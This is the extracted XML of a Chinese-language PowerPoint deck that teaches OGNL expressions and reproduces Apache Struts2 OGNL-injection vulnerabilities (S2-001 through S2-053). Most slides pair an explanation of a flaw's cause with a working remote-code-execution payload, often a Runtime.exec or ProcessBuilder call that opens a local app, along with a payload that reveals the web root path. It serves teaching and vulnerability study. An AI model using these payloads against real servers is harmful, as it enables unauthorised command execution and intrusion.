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103" r:id="rId2"/>
    <p:sldId id="1104" r:id="rId3"/>
    <p:sldId id="1105" r:id="rId4"/>
    <p:sldId id="1106" r:id="rId5"/>
    <p:sldId id="1115" r:id="rId6"/>
    <p:sldId id="1110" r:id="rId7"/>
    <p:sldId id="1111" r:id="rId8"/>
    <p:sldId id="1112" r:id="rId9"/>
    <p:sldId id="1113" r:id="rId10"/>
    <p:sldId id="1108" r:id="rId11"/>
    <p:sldId id="1107" r:id="rId12"/>
    <p:sldId id="1114" r:id="rId13"/>
  </p:sldIdLst>
  <p:sldSz cx="12196763" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:custDataLst>
    <p:tags r:id="rId1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A5A"/>
    <a:srgbClr val="ED5A00"/>
    <a:srgbClr val="E6E6E6"/>
    <a:srgbClr val="CAD1D4"/>
    <a:srgbClr val="F1F1F1"/>
    <a:srgbClr val="006BBC"/>
    <a:srgbClr val="F8F8F8"/>
    <a:srgbClr val="EAEAEA"/>
    <a:srgbClr val="DDDDDD"/>
    <a:srgbClr val="0D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6" autoAdjust="0"/>
    <p:restoredTop sz="95788" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="86" d="100"/>
          <a:sy n="86" d="100"/>
        </p:scale>
        <p:origin x="523" y="62"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide pos="384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69" d="100"/>
          <a:sy n="69" d="100"/>
        </p:scale>
        <p:origin x="-28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10686-844B-4A1B-87C8-BB90DB4BA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2023/3/14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5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6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8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7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9297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4913A8D-92DF-A275-A652-AB1087570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809" y="1268760"/>
            <a:ext cx="10297144" cy="5114180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 rootUser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"tom"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82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String, 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context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String, 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"user1"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context.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"user2"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"zhangsan"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63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OgnlContext oc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OgnlContext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//ognl由root和context两部分组成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(rootUser);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(context);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 ognl的root的值的时候，直接写希望获取的值的名字就可以了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name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(String)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//tom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Integer score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//82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 ognl非root的值的时候，需要使用#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Student name1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(Student)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"#context['user1']"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String name2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(String)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"#user2.name"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//zhangsan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 score1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"#user1.score"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//78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Integer score2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(Integer)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"#user2.score"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//63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//ognl的getValue函数可以直接执行java函数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 obj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"'helloworld'.length()"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//10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//访问静态属性和方法的时候需要使用@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Object obj2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"@java.lang.Runtime@getRuntime().exec('cmd.exe /c start dir')"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,oc.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//getValue具有代码执行能力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//命令执行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OgnlContext context2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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OgnlContext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"@java.lang.Runtime@getRuntime().exec('curl http://127.0.0.1:10000/')"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context2, context2.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getRoot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Ognl.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"(\"@java.lang.Runtime@getRuntime().exec(\'open/Applications/Calculator.app/\')\")(glassy)(amadeus)"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,context,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B11DEF-C55F-EF20-9E31-58C9D4329FB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909693" y="692696"/>
            <a:ext cx="102971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OGNL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>的最顶层对象是一个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对象，通常称这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>对象为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>context map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>OGNL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>就在这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>context map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>.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6D4A51-E542-69D7-429B-B7C8EFD2B754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注入漏洞基础原理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51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S2-005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AB6C6F9-5B6B-D43A-E8E1-E8BA0DFDA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21" y="260648"/>
            <a:ext cx="6989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1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C31DCC-4F3F-1FD5-82C7-4A909E03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88" y="1382284"/>
            <a:ext cx="9448800" cy="57531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75F684-617A-4F46-2982-F24010EBB33A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409749" y="767117"/>
            <a:ext cx="9808464" cy="369332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name=%{(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49010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S2-053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290D2F-E885-44F4-4BB5-12545202B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13" y="764704"/>
            <a:ext cx="8458896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3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E5489-AA45-C975-2697-7E7FB9795313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固定的语句格式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F30D4E-6042-B1D9-FB38-EB1C4D62737B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767825" y="79606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S2-001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14B466-A60F-4A3A-8A37-48CFE2AC2DB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1993925" y="786221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当参数值是形如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%{*}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的形式的时候，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会把这个值当做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OGNL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表达式去执行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7F9394-6AAA-209C-A823-98A7041E0AD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731738" y="2330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S2-003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AC7933-68F9-8E73-2101-092AECA6645A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1993925" y="2330234"/>
            <a:ext cx="952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通过构造形如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(exp)(a)(b)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的形式的表达式，放入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ognl.setvalue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，最终会将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14FD4A9-155F-A612-8542-087D5104691E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767825" y="1517491"/>
            <a:ext cx="8875315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%{@java.lang.Runtime@getRuntime().exec("open /Applications/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Calculator.app</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/")}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A2B86E-7F02-6AE6-093D-A20D08DE1C9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761156" y="3133489"/>
            <a:ext cx="1098187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http://www.glassy.com/test.action?(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'#context[\'xwork.MethodAccessor.denyMethodExecution\']=false'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)(a)(b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="294A5A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)&amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'@java.lang.Runtime@getRuntime().exec(\'open /Applications/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Notes.app</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/\')'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)(a)(b)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B3188-0407-B869-7DB3-9CBF26B1DBEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731738" y="414372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F6C0B-C7CA-5514-20FF-539AF59D7999}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2017998" y="4143726"/>
            <a:ext cx="952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redirect:\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redirectAction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作为前缀参数来进行短路导航状态变化，后面用来跟一个期望的目标表达式。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B248B9-A992-46BC-932A-BBB939F56AF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767825" y="5017343"/>
            <a:ext cx="1116320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http://www.glassy.com/Struts2Demo_war_exploded/hello.action? redirect:${#a=(new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(new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>java.lang.String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>[]{'/bin/bash', '-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>c','open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>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/'})).start()}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21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2E5489-AA45-C975-2697-7E7FB9795313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固定的语句格式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7B3188-0407-B869-7DB3-9CBF26B1DBEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709470" y="7069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S2-019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41F6C0B-C7CA-5514-20FF-539AF59D7999}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1995730" y="706968"/>
            <a:ext cx="952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从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debug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参数获取调试模式，如果模式是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command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，则把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expression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参最终放到了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中。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B248B9-A992-46BC-932A-BBB939F56AF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745557" y="1580585"/>
            <a:ext cx="1098187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http://www.glassy.com/Struts2Demo_war_exploded/hello.action? debug=command&amp;expression=#a=(new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('open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/')).start()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232F8-2B60-3FCB-64E0-F2EEB73D4C41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709470" y="2749057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S2-045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90F776-AE93-1736-BC12-18716C0623C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1995730" y="2749057"/>
            <a:ext cx="952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在处理上传文件出错的时候且错误信息中带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%{exp}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的时候，会把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exp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CDB540-EDEF-6054-3A75-22DC4E036E11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709470" y="3317364"/>
            <a:ext cx="10501479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Content-Type:%{(#glassy='multipart/form-data’). (#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(#a=(new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/Contents/MacOS/Notes')).start())}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9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075991-DFE3-CF0D-82BB-AECC33DD0F50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="193725" y="11663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漏洞成因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——</a:t>
            </a:r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环境配置下的漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C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EFF54-5D8C-9702-6B30-77A6CE524415}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668053" y="2782669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S2-048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740D9F-4CBB-AE4D-7064-0ADF2AA3AD11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1738289" y="2782669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使用了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Struts 1 plugin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Struts 1 action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2.3.x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版本，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ST2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处理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ST1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的时候会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ActionMessage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key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传给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3396E3-8C76-F227-DEA2-4A84F9B1C3CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668053" y="3574757"/>
            <a:ext cx="1071930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name=${(#glassy='multipart/form-data’).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(#a=(new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('/Applications/Notes.app/Contents/MacOS/Notes')).start())}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&amp;age=11&amp;__checkbox_bustedBefore=true&amp;description=22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A25E26-BF46-DA17-1997-2E1D2DF74808}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="636076" y="8367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S2-013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6C9A80-60FA-FCA8-A820-1ABB0EEFAEE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1706312" y="836712"/>
            <a:ext cx="9865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需要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jsp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s:url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s:a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标签中的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includeParams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属性为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all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或者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get.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计算标签中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-apple-system"/>
              </a:rPr>
              <a:t>action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-apple-system"/>
              </a:rPr>
              <a:t>路径的时候，会把参数值带入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-apple-system"/>
              </a:rPr>
              <a:t>ognl.getvalue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22441C-700F-F1F0-E7FB-64BAD69D58D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="636076" y="1628800"/>
            <a:ext cx="1071930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/>
              <a:t>http://www.glassy.com/Struts2Demo_war_exploded/hello.jsp?fakeParam=%{#a=(new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>java.lang.ProcessBuilder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>newjava.lang.String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>[]{"/bin/bash","-c", "open /Applications/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Notes.app</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/"})).start()}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1821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727588A0-F900-400E-26AE-2AB8116270D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2F1F908-B766-6EED-C4FB-091EB40E5A21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="634064" y="1268760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       #response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),    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altLang="zh-CN" b="0" dirty="0">
              <a:ea typeface="Cambria Math" panose="020405030504060302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F9BD7F-587F-DEEC-4686-AD38016EC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75" y="4005064"/>
            <a:ext cx="4495800" cy="18573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1C423AA-D000-66D1-E72F-685A811329BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553765" y="739883"/>
            <a:ext cx="55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获取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"/>
              </a:rPr>
              <a:t>web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路径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（在漏洞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S2-001</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>的环境下生效）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7567"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition advTm="756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2F5AC-6985-909E-8358-CF7AB9332B00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337741" y="1268760"/>
            <a:ext cx="10369152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#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),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 Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>//#response.println(#req.getRealPath('/’)),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ECF046-2775-72FE-68F0-521FC2FAC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" y="4077072"/>
            <a:ext cx="3953427" cy="194337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4AEBA14-2ECD-D355-D168-2F3D79167AB8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4FBCF5-8065-C2E4-0009-772665B95811}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="265733" y="6519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payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入语句中是否有顺序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2490568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8C2F5AC-6985-909E-8358-CF7AB9332B00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409749" y="1413446"/>
            <a:ext cx="10297144" cy="2308324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#req=@org.apache.struts2.ServletActionContext@getRequest(), </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1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 Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>//#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),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#response.println(#req.getRealPath('/')),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#response.flush(),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80E3BC-01A5-F226-CE67-11E08828F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71" y="4290392"/>
            <a:ext cx="3705742" cy="16099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212642-401E-6F7C-9832-91482F54E6EA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20E434-0075-E087-5C14-67EBA8F2C5FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337741" y="759803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payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入语句中是否有顺序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="780951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F057BB-CF8A-807D-9F61-559D9F3794CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337741" y="1388368"/>
            <a:ext cx="10369152" cy="1754326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#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(), #response.println((@org.apache.struts2.ServletActionContext@getRequest()).getRealPath('/')), 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#response.a    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>bbb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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>c.flush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(),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56B765-126B-B112-5677-C09A5A358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41" y="3645024"/>
            <a:ext cx="3829584" cy="19338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1FF067F-7C49-F7DC-FA29-EAC9FB4B82E5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196F12-D687-1483-2B14-F8CBB6F09D16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337741" y="75980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payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入语句中部分语句语法错误是否影响</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>检测结果</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1168425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44469BA-A5DF-D863-CA45-265F505195FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409749" y="1367656"/>
            <a:ext cx="10729192" cy="1754326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285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="294A5A"/>
                </a:solidFill>
                <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle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%{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#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),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#response.println((@org.apache.struts2.ServletActionContext@getRequest()).getRealPath('/')), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>#response.g().a.a.aaaa.ush(),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#response.close() </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0">
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18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86E750-8844-50E7-EA83-8E6C5209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4" y="3728376"/>
            <a:ext cx="3915321" cy="205768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4364A97-8ACA-E7AD-5096-69193AB62825}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337741" y="759803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payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入语句中部分语句语法错误是否影响</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>检测结果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4A8D59-C383-7F47-310D-1692ECD8E1CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="99827" y="121172"/>
            <a:ext cx="3896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漏洞复现  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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S2-001</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2077271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7567">
        <p15:prstTrans prst="airplane"/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="7567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043.pptx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1417</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>106</Paragraphs>
  <Slides>12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Calibri</vt:lpstr>
      <vt:lpstr>Cambria Math</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Wingdings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4043.pptx</dc:title>
  <dc:creator/>
  <cp:lastModifiedBy/>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-03-24T03:17:57Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-13T18:28:53Z</dcterms:modified>
</cp:coreProperties>
</file>